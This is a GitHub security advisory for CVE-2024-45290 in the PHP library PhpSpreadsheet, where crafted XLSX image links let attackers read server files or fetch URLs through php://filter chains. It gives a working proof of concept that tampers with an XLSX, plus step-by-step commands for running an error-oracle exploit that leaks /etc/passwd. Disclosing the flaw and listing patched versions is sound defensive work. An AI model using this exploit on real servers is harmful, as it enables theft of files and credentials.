Skip to content

Absolute path traversal and Server-Side Request Forgery when opening XLSX file

High
oleibman published GHSA-5gpr-w2p5-6m37 Oct 7, 2024

Package

composer phpoffice/phpspreadsheet (Composer)

Affected versions

>= 2.2.0, < 2.3.0
< 1.29.2
>= 2.0.0, < 2.1.1

Patched versions

2.3.0
1.29.2
2.1.1

Description

Summary

It's possible for an attacker to construct an XLSX file which links media from external URLs. When opening the XLSX file, PhpSpreadsheet retrieves the image size and type by reading the file contents, if the provided path is a URL. By using specially crafted php://filter URLs an attacker can leak the contents of any file or URL.

Note that this vulnerability is different from GHSA-w9xv-qf98-ccq4, and resides in a different component.

Details

When an XLSX file is opened, the XLSX reader calls setPath() with the path provided in the xl/drawings/_rels/drawing1.xml.rels file in the XLSX archive:

if (isset($images[$embedImageKey])) {
    // ...omit irrelevant code...
} else {
    $linkImageKey = (string) self::getArrayItem(
        $blip->attributes('http://schemas.openxmlformats.org/officeDocument/2006/relationships'),
        'link'
    );
    if (isset($images[$linkImageKey])) {
        $url = str_replace('xl/drawings/', '', $images[$linkImageKey]);
        $objDrawing->setPath($url);
    }
}

setPath() then reads the file in order to determine the file type and dimensions, if the path is a URL:

public function setPath(string $path, bool $verifyFile = true, ?ZipArchive $zip = null): static
{
    if ($verifyFile && preg_match('~^data:image/[a-z]+;base64,~', $path) !== 1) {
        // Check if a URL has been passed. https://stackoverflow.com/a/2058596/1252979
        if (filter_var($path, FILTER_VALIDATE_URL)) {
            $this->path = $path;
            // Implicit that it is a URL, rather store info than running check above on value in other places.
            $this->isUrl = true;
            $imageContents = file_get_contents($path);
            // ... check dimensions etc. ...

It's important to note here, that filter_var considers also file:// and php:// URLs valid.

The attacker can set the path to anything:

<Relationship Id="rId1"
    Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"
    Target="this can be whatever" />

The contents of the file are not made available for the attacker directly. However, using PHP filter URLs it's possible to construct an error oracle which leaks a file or URL contents one character at a time. The error oracle was originally invented by @hash_kitten, and the folks at Synacktiv have developed a nice tool for easily exploiting those: https://github.com/synacktiv/php_filter_chains_oracle_exploit

PoC

Target file:

<?php

require 'vendor/autoload.php';

// Attack part: this would actually be done by the attacker on their machine and the resulting XLSX uploaded, but to
// keep the PoC simple, I've combined this into the same file.

$file = "book_tampered.xlsx";
$payload = $_POST["payload"]; // the payload comes from the Python script

copy("book.xlsx",$file);
$zip = new ZipArchive;
$zip->open($file);

$path = "xl/drawings/_rels/drawing1.xml.rels";
$content = $zip->getFromName($path);
$content = str_replace("../media/image1.gif", $payload, $content);
$zip->addFromString($path, $content);

$path = "xl/drawings/drawing1.xml";
$content = $zip->getFromName($path);
$content = str_replace('r:embed="rId1"', 'r:link="rId1"', $content);
$zip->addFromString($path, $content);

$zip->close();

// The actual target - note that simply opening the file is sufficient for the attack

$reader = \PhpOffice\PhpSpreadsheet\IOFactory::createReader("Xlsx");
$spreadsheet = $reader->load(__DIR__ . '/' . $file);

Add this file in the same directory:
book.xlsx

Serve the PoC from a web server. Ensure your PHP memory limit is <= 128M - otherwise you'll need to edit the Python script below.

Download the error oracle Python script from here: https://github.com/synacktiv/php_filter_chains_oracle_exploit. If your memory limit is greater than 128M, you'll need to edit the Python script's bruteforcer.py file to change self.blow_up_inf = self.join(*[self.blow_up_utf32]*15) to self.blow_up_inf = self.join(*[self.blow_up_utf32]*20). This is needed so that it generates large-enough payloads to trigger the out of memory errors the oracle relies on. Also install the script's dependencies with pip.

Then run the Python script with:

python3 filters_chain_oracle_exploit.py --target [URL of the script] --parameter payload --file /etc/passwd

Note that the attack relies on certain character encodings being supported by the system's iconv library, because PHP uses that. As far as I know, most Linux distributions have them, but notably MacOS does not. So if you're developing on a Mac, you'll want to run your server in a virtual machine with Linux.

Here's the results I got after about a minute of bruteforcing:

image

Impact

An attacker can access any file on the server, or leak information form arbitrary URLs, potentially exposing sensitive information such as AWS IAM credentials.

Severity

High

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
/ 10

CVSS v3 base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
Low
User interaction
None
Scope
Changed
Confidentiality
High
Integrity
None
Availability
None

CVSS v3 base metrics

Attack vector: More severe the more the remote (logically and physically) an attacker can be in order to exploit the vulnerability.
Attack complexity: More severe for the least complex attacks.
Privileges required: More severe if no privileges are required.
User interaction: More severe when no user interaction is required.
Scope: More severe when a scope change occurs, e.g. one vulnerable component impacts resources in components beyond its security scope.
Confidentiality: More severe when loss of data confidentiality is highest, measuring the level of data access available to an unauthorized user.
Integrity: More severe when loss of data integrity is the highest, measuring the consequence of data modification possible by an unauthorized user.
Availability: More severe when the loss of impacted component availability is highest.
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N

CVE ID

CVE-2024-45290

Credits